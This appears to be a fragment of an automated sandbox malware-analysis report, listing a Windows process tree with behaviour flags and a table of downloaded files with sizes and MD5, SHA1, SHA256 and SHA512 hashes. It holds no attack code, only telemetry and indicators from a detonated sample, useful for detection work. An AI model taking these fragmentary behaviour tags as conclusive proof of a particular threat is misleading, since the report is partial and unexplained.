C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:208
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3128
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3296
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3296 -s 6722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3452
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3736
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4404
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4404 -s 3922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:212
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:3600
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2752
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:3488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4304 -ip 43042⤵PID:5036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4788 -ip 47882⤵PID:3620
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 544 -p 4404 -ip 44042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2384
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3296 -ip 32962⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3716
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 4788 -ip 47882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:388
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 1812 -ip 18122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2524
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4232
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4788
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4788 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2288
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1812
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1812 -s 3042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3460
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
39KB
MD54077cbffe145b53eedaba023e99ec5a1
SHA18b45ed487c366cca13d225cfe1c06bd57c9363b1
SHA256d0b4c15d7cb8a33a8948e19496ca12766624df9a8c8949d532aaa337ff7f9150
SHA5127c96bc3267890592743ed9bf501b2db8931f87f3c2db2f3b6f6dff06b7344974f0dfb6e619d30d8c95627e2c8e57230098dbf80b8a5b37450b794b3ad0b6f127
-
Filesize
13KB
MD54a42b14423811b54930095ec651cee2b
SHA18459e4a12b4ecb3ea6e00a04876550e40f9673e3
SHA2568fec1b1c248f2b06e5ffe350f70df64802eae858d4ae82bb1e476d88b7ccf076
SHA51282cd965de83d8279991562ffccccf50d760b34081ae3d37436ac328addb103f87ebf14ccde28ae61ca55813328c79d4b356dec160b6ad0534c5276af121558ba
-
Filesize
37KB
MD54adcc8074385e3acade220cbbecaa6ef
SHA1c65542f29e3f85bcfcf581e3064971595ec5e3a3
SHA2560b352f1ba10e6fa20190f1238dc044397de43fd26c68d6bd0023b8b6f377044f
SHA512a9ca078330b2de52dd265707346f4cb36f291bb248be7de3170b0eba87eec15cc999edeb01926100b92719e9ef9c2a138b952d1d3ee133df8664220a822e4ae2
-
Filesize
13KB
MD5891716316e5adfa8e82b164d631e91be
SHA1a41ed314199a082df52e4671a8d7e476bae4652f
SHA256c991337d6159f9511c17e970c066bbf867ffe8d376cab3a3c8757b143f0627fb
SHA5121ae9e0df7f99509be9fcc4d84fcdef637f308f4fe87f2da50c663049c74154c5e6e6f960aa5ebf16d3dd5ec5ba700a2b3d1a521fa45f6d0c30108399caf4002d
-
Filesize
36KB
MD556b63c978d3e4d0c1e4c37b299b989c4
SHA1969acb629ee199d59acefaf896f1a958002eb95b
SHA256ba9bfee6a1f9b717dfc70fc3f923777cdd5cdfe2861a9baab588a6e8f842fe67
SHA512399d48ddbffd72a1679e226384baab70da9d05af7bd202679ae49530b1df65420ab4a31892db41279742a577f7c77d5a51027e15f3f5220df6217bdfa6ef8942
-
Filesize
13KB
MD5ddc89262ea408973fc90150d103a01dc
SHA12dfdd7a503a0b8cfa0f124034ef01b8eebb7e187
SHA256c3628d4f5aa96ad098840d9988fe0a2d0779489dc54c88c0674512ed26ce13c2
SHA5127c9852d1a7fd92d986bab8a04d1690afde13bf06b743449365e9057e59e38fcb415cfa33205f5f696be86699344893dfc66332816b0bdf1e096b3b4c444fe494
-
Filesize
36KB
MD5668a4588155ae49bc286d1e265ca62fa
SHA15e64f3abec56a048c54e560a664fc01c5827bcda
SHA256bc23857c8c0b5f505e51981ba7f14ddfff0cf25179884af9f62c9144769a42e1
SHA5126350260ddf09614cced381c0dd771e9a0c2d4b4a132c3c7401613a768e60b4741df1538bdb4b54e64ba212983bbcaebe96a2587ecc352ce9d0bdde9c932dbbf5
-
Filesize
13KB
MD5f6ef366aac8b477455aa935f1df41cb7
SHA1995420eaeadf040cafbf9cee7f1887708dd3e4ac
SHA25672db396cc89850d1089382fe76c5233529a7f38498445640b7e7d044f6c4049d
SHA5123afb5638d7ad17cc7a7f8ce6ebecf097e6fbcae86e0b370177233e54010f3173415ceef3460c49b86f25159a1c01c240a0ff1b304efb8062cc58639b7a04af03
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
19KB
MD58436a99949404ca88131bbc67ce7b1f9
SHA12781b16bfe5ed37d769c28f4235c9fd24a27a367
SHA25631914a5856616650e92e99ec376a5e7b453019be76d72703430a3b6482c8e2c3
SHA512e9ee8de928055a159ceb1ece8100afa70a86346ef133005889f661e8deef30bd05238fdb59053748875e05e7ada17fa8eb4f663161ceb72189123e068b1b7233
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
512KB
MD5cb925a87cb2bb91f7d595dddc81324eb
SHA17c6826f74094a560b3290730ac6b9a41b88363cf
SHA256ee916f82bd0c2419c8d8996128af2c05bf8501de7bfcc44cf60e82696c901d30
SHA5124d3271a7567cb4e615ec771e1d7b36131d545955921b3df69302334a6183a0384f13ddd643159671c5e84490f6d14c7d4a573de5e5c87b2ae506a81b67e970e1
-
Filesize
14.0MB
MD54882ac82a8f75a992c2b1c883a14d727
SHA1c41e80569641316438938f9cc25ecc3d11c6aaae
SHA256e5e9441684438d0fb0e78b9eb9eb5d71eb89dff76a9e25b3a95f6df3e21b603b
SHA512a03aafa466ccb28ebcbf77d8d490a0c7bae83fbdca9bfffc43af25f9174898fdff4948e8fc347b746923662dfbe5a78dc43acb4bc936acdd9360c4ea735a9cba
-
Filesize
16KB
MD5104be2fbe4b86ab2e0ebfe43816db5ab
SHA10812bc7d9464c7dc139ffe94aabbfb0bec411786
SHA256344c0563696ce289867c1c5db6a5b485e7ebd9f8abd4114829c5aeb9682f506c
SHA51203a3e4c352882c947c351cbbc2dddb23c5379968a58200a0b1007c5ed14ff2b582e7d72138fdd78b6e1a4a1b63453cd2d6dc925c0833916986a7e4ec4331789c
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
477KB
MD53753f9966e5b4fdc87184c1749f2bd25
SHA169b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA2560f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA5123283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6
-
Filesize
477KB
MD53753f9966e5b4fdc87184c1749f2bd25
SHA169b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA2560f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA5123283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a